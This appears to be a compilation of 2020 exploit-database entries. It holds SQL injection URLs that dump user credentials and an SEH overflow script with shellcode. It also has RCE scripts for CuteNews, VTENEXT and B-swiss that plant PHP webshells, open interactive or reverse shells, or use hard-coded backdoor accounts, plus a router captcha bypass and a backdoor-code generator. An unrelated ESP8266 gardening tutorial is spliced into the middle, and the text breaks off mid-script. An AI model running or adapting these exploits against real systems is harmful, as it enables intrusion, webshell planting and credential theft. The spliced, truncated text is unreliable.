# Exploit Title: Tailor Management System - 'id' SQL Injection # Google Dork: N/A # Date: 2020-09-08 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL # Version: v1.0 # Tested on: Kali linux # CVE: N/A http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- - http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- - http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -

# Exploit Title: Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH) # Date: 2020-09-08 # Author: Felipe Winsnes # Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe # Version: 3.2.2 # Tested on: Windows 7 (x86) # Blog: https://whitecr0wz.github.io/ # Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif # Proof of Concept: # 1.- Run the python script, it will create the file "poc.txt" & "buf.txt". # 2.- Copy the content of the new file "buf.txt" to clipboard. # 3.- Open the application. # 4.- Click on the bottom-right blue button to eject. # 5.- Delete everything on the parameter and paste the clipboard (buf.txt). # 6.- Click eject once again to close it. # 7.- Copy poc.txt to the clipboard. # 8.- Click on "Register". # 9.- Paste clipboard (poc.txt) on the parameter "Name". # 10.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 447 bytes buf = b"w00tw00t" buf += b"\x89\xe2\xda\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37" buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" buf += b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b\x58\x6d\x52" buf += b"\x63\x30\x47\x70\x63\x30\x61\x70\x6b\x39\x4a\x45\x65" buf += b"\x61\x4f\x30\x33\x54\x6e\x6b\x30\x50\x66\x50\x6c\x4b" buf += b"\x62\x72\x54\x4c\x4c\x4b\x33\x62\x32\x34\x4c\x4b\x42" buf += b"\x52\x64\x68\x64\x4f\x4d\x67\x42\x6a\x37\x56\x36\x51" buf += b"\x39\x6f\x4e\x4c\x67\x4c\x50\x61\x31\x6c\x45\x52\x36" buf += b"\x4c\x45\x70\x7a\x61\x78\x4f\x46\x6d\x37\x71\x4a\x67" buf += b"\x79\x72\x78\x72\x36\x32\x43\x67\x6e\x6b\x56\x32\x34" buf += b"\x50\x6e\x6b\x51\x5a\x77\x4c\x6e\x6b\x52\x6c\x74\x51" buf += b"\x34\x38\x49\x73\x53\x78\x67\x71\x48\x51\x30\x51\x6e" buf += b"\x6b\x62\x79\x37\x50\x56\x61\x6a\x73\x6c\x4b\x63\x79" buf += b"\x45\x48\x79\x73\x47\x4a\x42\x69\x6c\x4b\x44\x74\x6c" buf += b"\x4b\x56\x61\x68\x56\x76\x51\x59\x6f\x4c\x6c\x79\x51" buf += b"\x58\x4f\x54\x4d\x77\x71\x39\x57\x76\x58\x4b\x50\x53" buf += b"\x45\x38\x76\x47\x73\x71\x6d\x5a\x58\x37\x4b\x31\x6d" buf += b"\x46\x44\x71\x65\x4a\x44\x33\x68\x4e\x6b\x36\x38\x57" buf += b"\x54\x36\x61\x6a\x73\x43\x56\x6c\x4b\x54\x4c\x50\x4b" buf += b"\x6c\x4b\x36\x38\x57\x6c\x75\x51\x6b\x63\x4c\x4b\x45" buf += b"\x54\x4c\x4b\x65\x51\x6a\x70\x6f\x79\x73\x74\x57\x54" buf += b"\x76\x44\x33\x6b\x63\x6b\x43\x51\x72\x79\x72\x7a\x63" buf += b"\x61\x6b\x4f\x49\x70\x61\x4f\x63\x6f\x61\x4a\x4c\x4b" buf += b"\x62\x32\x4a\x4b\x4e\x6d\x73\x6d\x61\x7a\x57\x71\x6c" buf += b"\x4d\x4f\x75\x4c\x72\x47\x70\x65\x50\x35\x50\x56\x30" buf += b"\x63\x58\x50\x31\x6e\x6b\x32\x4f\x4c\x47\x49\x6f\x79" buf += b"\x45\x6d\x6b\x6d\x30\x47\x6d\x76\x4a\x65\x5a\x33\x58" buf += b"\x49\x36\x7a\x35\x6d\x6d\x4d\x4d\x49\x6f\x4e\x35\x37" buf += b"\x4c\x37\x76\x51\x6c\x35\x5a\x6f\x70\x6b\x4b\x4b\x50" buf += b"\x63\x45\x54\x45\x6f\x4b\x53\x77\x54\x53\x71\x62\x70" buf += b"\x6f\x50\x6a\x35\x50\x46\x33\x79\x6f\x68\x55\x31\x73" buf += b"\x53\x51\x70\x6c\x43\x53\x56\x4e\x62\x45\x73\x48\x71" buf += b"\x75\x67\x70\x41\x41" egg = "" egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" egg += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10023B71) buffer = "A" * 456 + nseh + seh + "A" * 5 + egg + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close() f = open ("buf.txt", "w") f.write(buf) f.close()

# Exploit Title: CuteNews 2.1.2 - Remote Code Execution # Google Dork: N/A # Date: 2020-09-10 # Exploit Author: Musyoka Ian # Vendor Homepage: https://cutephp.com/cutenews/downloading.php # Software Link: https://cutephp.com/cutenews/downloading.php # Version: CuteNews 2.1.2 # Tested on: Ubuntu 20.04, CuteNews 2.1.2 # CVE : CVE-2019-11447 #! /bin/env python3 import requests from base64 import b64decode import io import re import string import random import sys banner = """ _____ __ _ __ ___ ___ ___ / ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ | / /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/ \___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/ ___ _________ / _ \/ ___/ __/ / , _/ /__/ _/ /_/|_|\___/___/ """ print (banner) print ("[->] Usage python3 expoit.py") print () sess = requests.session() payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>" ip = input("Enter the URL> ") def extract_credentials(): global sess, ip url = f"{ip}/CuteNews/cdata/users/lines" encoded_creds = sess.get(url).text buff = io.StringIO(encoded_creds) chash = buff.readlines() if "Not Found" in encoded_creds: print ("[-] No hashes were found skipping!!!") return else: for line in chash: if "<?php die('Direct call - access denied'); ?>" not in line: credentials = b64decode(line) try: sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1) print (sha_hash) except: pass def register(): global sess, ip userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10)) postdata = { "action" : "register", "regusername" : userpass, "regnickname" : userpass, "regpassword" : userpass, "confirm" : userpass, "regemail" : f"{userpass}@hack.me" } register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False) if 302 == register.status_code: print (f"[+] Registration successful with username: {userpass} and password: {userpass}") else: sys.exit() def send_payload(payload): global ip token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text signature_key = re.search('signature_key" value="(.*?)"', token).group(1) signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1) logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1) print (f"signature_key: {signature_key}") print (f"signature_dsi: {signature_dsi}") print (f"logged in user: {logged_user}") files = { "mod" : (None, "main"), "opt" : (None, "personal"), "__signature_key" : (None, f"{signature_key}"), "__signature_dsi" : (None, f"{signature_dsi}"), "editpassword" : (None, ""), "confirmpassword" : (None, ""), "editnickname" : (None, logged_user), "avatar_file" : (f"{logged_user}.php", payload), "more[site]" : (None, ""), "more[about]" : (None, "") } payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text print("============================\nDropping to a SHELL\n============================") while True: print () command = input("command > ") postdata = {"cmd" : command} output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata) if 404 == output.status_code: print ("sorry i can't find your webshell try running the exploit again") sys.exit() else: output = re.sub("GIF8;", "", output.text) print (output.strip()) if __name__ == "__main__": print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================") extract_credentials() print ("================================================================") print() print ("=============================\nRegistering a users\n=============================") register() print() print("=======================================================\nSending Payload\n=======================================================") send_payload(payload) print ()

# Exploit Title: ZTE Router F602W - Captcha Bypass # Exploit Author: Hritik Vijay (@MrHritik) # Vendor Homepage: https://zte.com.cn # Reported: 2019-06-14 # Version: F6x2W V6.0.10P2T2 # Version: F6x2W V6.0.10P2T5 # Tested on: F602W # CVE: CVE-2020-6862 Background ----------- Captcha is used to make sure the form is being filled by a real person than an automated script. This is a very popular safety measure and bypassing it could lead to potential compromise. Introduction ------------ While logging in to the affected device you are presented with a username, password and captcha field. Submitting the form results in an HTTP request being sent out to /checkValidateCode.gch to validate the captcha, if valid it goes on to really submit the login request. This can be easily bypassed as this is a client side verification. One can always ignore the response and proceed to forcefully submit the form via Javascript (via calling the subpageSubmit() method). A typical login request looks like this: POST / HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/ Content-Type: application/x-www-form-urlencoded Content-Length: 101 Connection: close Cookie: _TESTCOOKIESUPPORT=1 Upgrade-Insecure-Requests: 1 frashnum=&action=login&Frm_Logintoken=2&Username=admin&Password=admin&Validatecode=literally_anything Though, firing the same request twice fails with a text on the top saying "Error". This pretty much defeats our purpose. It turns out that on every login attempt, the parameter Frm_Logintoken gets incremented by one and is required to match the server side value. This can pretty easily be achieved by some pattern matching. Thus allowing any script to bypass the captcha and log in. Threat ------- A captcha bypass can really help in bruteforcing the credentials but luckily the router limits the login trials to 3 attempts. In real world though, things are a bit different. The affected ZTE router comes with a default password. Given that the devices on a same ISP network can access each other, it would be a matter of time before someone writes a script to log in to every router in the network and take control of it. PoC ------- #!/bin/bash SERVER=192.168.1.1 USER="admin" PASS="admin" getToken(){ curl -s --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER | grep 'Frm_Logintoken")' | cut -d\" -f4 } Frm_Logintoken=`getToken` s=$(curl -sv --data "frashnum=&action=login&Frm_Logintoken=$Frm_Logintoken&Username=$USER&Password=$PASS" --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER -w "%{http_code}" -o /dev/null 2> /tmp/zte_cookie) if [[ $s -eq 302 ]]; then echo "Logged in" echo "Open http://$SERVER/start.ghtml" echo `grep -o Set-Cookie.* /tmp/zte_cookie` else echo "Failed" fi

#!/usr/bin/env python3 # Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption # Date: 2020-09-10 # Exploit Author: Cody Winkler # Vendor Homepage: gnome.org # Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html # Version: 3.34.0 # Tested On: Ubuntu 20.04.1 LTS # # Note: May take a few tries. Too many consecutive runs can freeze OS. # This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped. from os import system this_pattern = "BEEF"*21125 # needs to be filled to len ~84500 # TTF file header (probably has some junk data in it) taken from MesloLGS NF Regular.ttf ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54" "\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45" "\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f" "\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55" "\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f" "\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45" "\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61" "\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74" "\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67" "\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73" "\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79" "\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61" "\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65" "\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74" "\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63" "\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78" "\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d" "\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73" "\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65" "\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00" "\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08" "\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14" "\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a") print('[+] Generating crash.ttf with DEADDEAD') with open("./crash.ttf", 'w') as f: f.write(ttf_header) f.write(this_pattern) f.close() print('[+] Done') print('[+] Triggering out-of-bounds write in gnome-font-viewer') system("/usr/bin/gnome-font-viewer ./crash.ttf")

#!/usr/bin/python3 # Exploit Title: VTENEXT 19 CE - Remote Code Execution # Google Dork: n/a # Date: 2020/09/09 # Exploit Author: Marco Ruela # Vendor Homepage: https://www.vtenext.com/en/ # Software Link: Vendor removed vulnerable version from sourceforge.net # Version: 19 CE # Tested on: Ubuntu 16.04 # CVE : N/A # 2020/03/07 - Disclosed vulnerabilities to vendor # 2020/03/10 - Vendor committed to fix # 2020/09/09 - Public disclosure # This script should be easy enough to follow. # We string together the three vulnerabilities to get RCE. # XSS - The "From" field of the VTENEXT Messages module is vulnerable. # File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default . # CSRF - No CSRF protections in place. # exploit.js needs to be hosted somewhere, IP's need to be replaced # check_csrf() should be changed based on your setup # run_shell() is a "nice to have" # content of exploit.js """ function insertImage() { var xhr = new XMLHttpRequest(); xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true); xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt'); xhr.setRequestHeader('Content-Length', '248'); xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php'); xhr.withCredentials = true; var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--'; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } insertImage(); """ import smtplib import datetime import requests import os import time base_url = "http://192.168.226.168/vtenext19ce/" print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC") def build_url(): d = datetime.datetime.today() year = str(d.year) month = str(d.strftime("%B")) week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1]) tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/" return(tmp) def build_mail(): _from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'""" _to = "admin@example.com" _subject = "Important!" _body = "While you're reading this, a file is being uploaded to this server." msg = "From: " + _from + "\n" msg += "To: " + _to + "\n" msg += "Subject: " + _subject + "\n\n" msg += _body return msg def send_mail(): msg = build_mail() smtp_server = '192.168.226.167' smtp_port = 25 sender = 'user1@lab.local' receiver = 'admin@lab.local' server = smtplib.SMTP(smtp_server, smtp_port) server.sendmail(sender, receiver, msg) def check_csrf(): while True: is_there = os.popen('tail -n1 /var/log/apache2/access.log').read() if "200" in is_there and "/exploit.js" in is_there and base_url in is_there: print("[>] CSRF triggered") break else: time.sleep(0.5) continue def find_shell(): print("[>] Locating shell") time.sleep(1) tmp1 = build_url() for i in range(1, 9999): url = tmp1 + str(i) + "_shell.pht" r = requests.get(url) if r.status_code == 200: print("[>] Found the shell") print("[-] Location: " + url) return url else: continue def run_shell(x): print("\n") while True: cmd = input("shell> ") if cmd == "exit": break else: url = x + "?x=" + cmd r = requests.get(url) print(r.text) print("[>] Sending email") send_mail() print("[-] Waiting for user to open mail") check_csrf() shell_location = find_shell() run_shell(shell_location) print("[!] Done!")

# Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path # Discovery by: Burhanettin Özgenç # Discovery Date: 2020-09-15 # Vendor Homepage: https://www.forensit.com/downloads.html # Tested Version: 2.2.0.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """ ForensiT AppX Management Service ForensiTAppxService C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe Auto # Service info: C:\>sc qc ForensiTAppxService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ForensiTAppxService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ForensiT AppX Management Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the system # root path undetected by the OS or other security applications where it could potentially be executed # during application startup or reboot. If successful, the local user's code would execute with # the elevated privileges of the application.

# Exploit Title: Mida eFramework 2.9.0 - Back Door Access # Google Dork: Server: Mida eFramework # Date: 2020-08-27 # Exploit Author: elbae # Vendor Homepage: https://www.midasolutions.com/ # Software Link: http://ova-efw.midasolutions.com/ # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html # Version: <= 2.9.0 # CVE : CVE-2020-15921 #! /usr/bin/python3 # -*- coding: utf-8 -*- from datetime import date def print_disclaimer(): print(""" --------------------- Disclaimer: 1) For testing purpose only. 2) Do not attack production environments. 3) Intended for educational purposes only and cannot be used for law violation or personal gain. 4) The author is not responsible for any possible harm caused by this material. ---------------------""") def print_info(): print(""" [*] Mida Solutions eFramework PDC Administrative Back-Door access (CVE-2020-15921) [*] Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html [*] This script can be used to retrieve the code which gives you the possibility to change the password. [*] How it works: 1) run the script 2) copy the output to the URL you want to access (i.e. http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE) 3) change the password 4) access as admin with the password """) def main(): print_info() print_disclaimer() abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'] baseString = 'midasoluti' # default value from source code today = date.today() dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year) retString = "" for i in range(0,len(baseString)): n = int(abc.index(baseString[i])) m = int(dateString[i]) s = n+m if (s >= len(abc)): s = m retString += abc[s] print("[+] Generated code: {}".format(retString)) print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0} ".format(retString)) print("[?] Example URL: https://target/PDC/extreq.php?code={0} ".format(retString)) if __name__ == '__main__': main()

# Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection # Date: 2020-09-20 # Exploit Author: Augkim # Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip # Tested on: Apache2 POST /URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8-- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/sere/ Connection: close Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Origin: foo.example.org PoC: /URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--

In order to enrich our elderly care life. In this article, we will introduce the use of Esp8266 to make an intelligent flower cultivation system. Implementation of functions Check the current temperature, humidity and soil humidity through the mobile phone. When the soil humidity is less than 50%, automatically start the relay and water it with a water pump. Disconnect the relay if the humidity exceeds 50%. Required Equipment esp8266 relay DHT11 soil moisture sensor Line connection Equipment VCC (+) GND (-) Signal Line Relay 3VGNDD4DHT113VGNDD2 Soil Sensor 3VGNDD0 Code #define BLINKER_WIFI #define BLINKER_MIOT_SENSOR //Introduce Xiaoai classmate #define soilPin A0 //Soil sensor pin DO #define CS 2 //Define the relay pin to D4 #include Blinker.h #include DHT.h //DHT11 sensor header file #define DHTPIN 4 //Define DHT11 module connection pin io4 (D2 pin) #define DHTTYPE DHT11 //Use the DHT11 temperature and humidity module, of course you can also replace other DHTs //Storage the soil value int soilValue; //Define soil moisture int soilMoisture; char auth[]='1c2ce3eef946'; //The key key of the lamp app char ssid[]='PDCN'; //WiFi name to connect to char pswd[]='1234567890'; //WiFi password BlinkerNumber HUMI('humi'); //Define the humidity data key name BlinkerNumber TEMP('temp'); //Define the temperature data key name BlinkerNumber TEMP2('temp2'); //Define the soil moisture data key name DHT dht(DHTPIN, DHTTYPE); //Define dht float humi_read=0, temp_read=0; //Initialize the read data //Dashboard components void heartbeat() { HUMI.print(humi_read); //Relay humidity data back to blinkerapp TEMP.print(temp_read); //Relay the temperature data to blinkerapp TEMP2.print(soilMoisture); if(soilMoisture=50) //Soil humidity is less than 50 { digitalWrite(CS,digitalRead(CS)); //Run the relay } else { digitalWrite(CS, HIGH); } } //Real-time curve chart component void dataStorage() { Blinker.dataStorage('temp', temp_read); Blinker.dataStorage('humi', humi_read); Blinker.dataStorage('humi2', soilMoisture); } //The data is returned to Xiao Ai classmate void miotQuery(int32_t queryCode) { BLINKER_LOG('MIOT Query codes: ', queryCode); int humi_read_int=humi_read; //Convert float to int type, integer BlinkerMIOT.humi(humi_read_int); //Xiaoai receives humidity BlinkerMIOT.temp(temp_read); //Xiaoai receives temperature BlinkerMIOT.print(); } void setup() { //Initialize the serial port Serial, enable debug output Serial.begin(9600);//Bad rate BLINKER_DEBUG.stream(Serial); BLINKER_DEBUG.debugAll(); Blinker.begin(auth, ssid, pswd);//WIFI initialization settings Blinker.attachHeartbeat(heartbeat);//Register dashboard dht.begin(); BlinkerMIOT.attachQuery(miotQuery);//Register Xiaoai Blinker.attachDataStorage(dataStorage);//Register real-time curve pinMode(LED_BUILTIN, OUTPUT); digitalWrite(LED_BUILTIN, 1); pinMode(CS, OUTPUT);//Initialize the relay pin digitalWrite(CS, HIGH); //Initialize the relay pin } void loop() { Blinker.run();//Responsible for processing the data received by blinker. Each time it runs, it will parse the data received by the device once. (This is very important) float h=dht.readHumidity();//Read the humidity data collected by DHT11 float t=dht.readTemperature();//Read the temperature data collected by DHT11 if (isnan(h) || isnan(t))//Judge whether the temperature and humidity value is empty { BLINKER_LOG('Reading sensor data failed'); } else { BLINKER_LOG('Humidity: ', h, ' %');//Print out debug information BLINKER_LOG('Temperature: ', t, ' *C'); humi_read=h; temp_read=t; } soilValue=analogRead(soilPin); //Get the soil value 0-1024 soilMoisture=map(soilValue,0,1023,100,0);//Convert 0-1024 to 100%-0 The soil moisture in the air is 1024 Blinker.delay(200); //Delay function, maintains connection between devices and data reception processing during the delay process } Effect When the humidity is less than 50%, the relay automatically works. When the soil moisture is higher than 50%, the relay stops working Of course, the above code only completes the corresponding functions. There may be certain shortcomings. You can modify it yourself according to your actual situation.

# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution # Date: 2020-08-27 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: <= 3.6.5 # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution # # # Vendor: B-Swiss SARL | b-tween Sarl # Product web page: https://www.b-swiss.com # Affected version: 3.6.5 # 3.6.2 # 3.6.1 # 3.6.0 # 3.5.80 # 3.5.40 # 3.5.20 # 3.5.00 # 3.2.00 # 3.1.00 # # Summary: Intelligent digital signage made easy. To go beyond the # possibilities offered, b-swiss allows you to create the communication # solution for your specific needs and your graphic charter. You benefit # from our experience and know-how in the realization of your digital # signage project. # # Desc: The application suffers from an "authenticated" arbitrary # PHP code execution. The vulnerability is caused due to the improper # verification of uploaded files in 'index.php' script thru the 'rec_poza' # POST parameter. This can be exploited to execute arbitrary PHP code # by uploading a malicious PHP script file that will be stored in # '/usr/users' directory. Due to an undocumented and hidden "maintenance" # account 'admin_m' which has the highest privileges in the application, # an attacker can use these hard-coded credentials to authenticate and # use the vulnerable image upload functionality to execute code on the # server. # # ======================================================================================== # lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777 # [*] Checking target... # [*] Good to go! # [*] Checking for previous attempts... # [*] All good. # [*] Getting backdoor session... # [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2 # [*] Starting callback listener child thread # [*] Starting handler on port 7777 # [*] Adding GUI credentials: test:123456 # [*] Executing and deleting stager file # [*] Connection from 192.168.10.11:40080 # [*] You got shell! # id ; uname -or # uid=33(www-data) gid=33(www-data) groups=33(www-data) # 4.15.0-20-generic GNU/Linux # exit # *** Connection closed by remote host *** # [?] Want me to remove the GUI credentials? y # [*] Removing... # [*] t00t! # lqwrm@metalgear:~/prive$ # ======================================================================================== # # Tested on: Linux 5.3.0-46-generic x86_64 # Linux 4.15.0-20-generic x86_64 # Linux 4.9.78-xxxx-std-ipv6-64 # Linux 4.7.0-040700-generic x86_64 # Linux 4.2.0-27-generic x86_64 # Linux 3.19.0-47-generic x86_64 # Linux 2.6.32-5-amd64 x86_64 # Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 # macOS 10.13.5 # Microsoft Windows 7 Business Edition SP1 i586 # Apache/2.4.29 (Ubuntu) # Apache/2.4.18 (Ubuntu) # Apache/2.4.7 (Ubuntu) # Apache/2.2.22 (Win64) # Apache/2.4.18 (Ubuntu) # Apache/2.2.16 (Debian) # PHP/7.2.24-0ubuntu0.18.04.6 # PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 # PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 # PHP/5.6.31 # PHP/5.6.30-10+deb.sury.org~xenial+2 # PHP/5.5.9-1ubuntu4.17 # PHP/5.5.9-1ubuntu4.14 # PHP/5.3.10 # PHP/5.3.13 # PHP/5.3.3-7+squeeze16 # PHP/5.3.3-7+squeeze17 # MySQL/5.5.49 # MySQL/5.5.47 # MySQL/5.5.40 # MySQL/5.5.30 # MySQL/5.1.66 # MySQL/5.1.49 # MySQL/5.0.77 # MySQL/5.0.12-dev # MySQL/5.0.11-dev # MySQL/5.0.8-dev # phpMyAdmin/3.5.7 # phpMyAdmin/3.4.10.1deb1 # phpMyAdmin/3.4.7 # phpMyAdmin/3.3.7deb7 # WampServer 3.2.0 # Acore Framework 2.0 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2020-5590 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php # # # 13.06.2020 # from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf from time import sleep# | 01 | 04 | #peels trompi emit morf import urllib.request# | | | | #tseuqer.billru tropmi import urllib.parse# | | | | #esrap.billru tropmi import telnetlib# | | | #biltenlet tropmi import threading# | | | | #gnidaerht tropmi import requests# | | | | #stseuqer tropmi import socket# | | o | #tekcos tropmi import sys,re# | | | #er,sys tropmi ############## #-----------------+-----------------# ############## ############### oOo ############### ################ | ################ #################### Y #################### ############################ _ ############################ ############################################################################################### class Sign: def __init__(self): self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d" self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73" self.password = 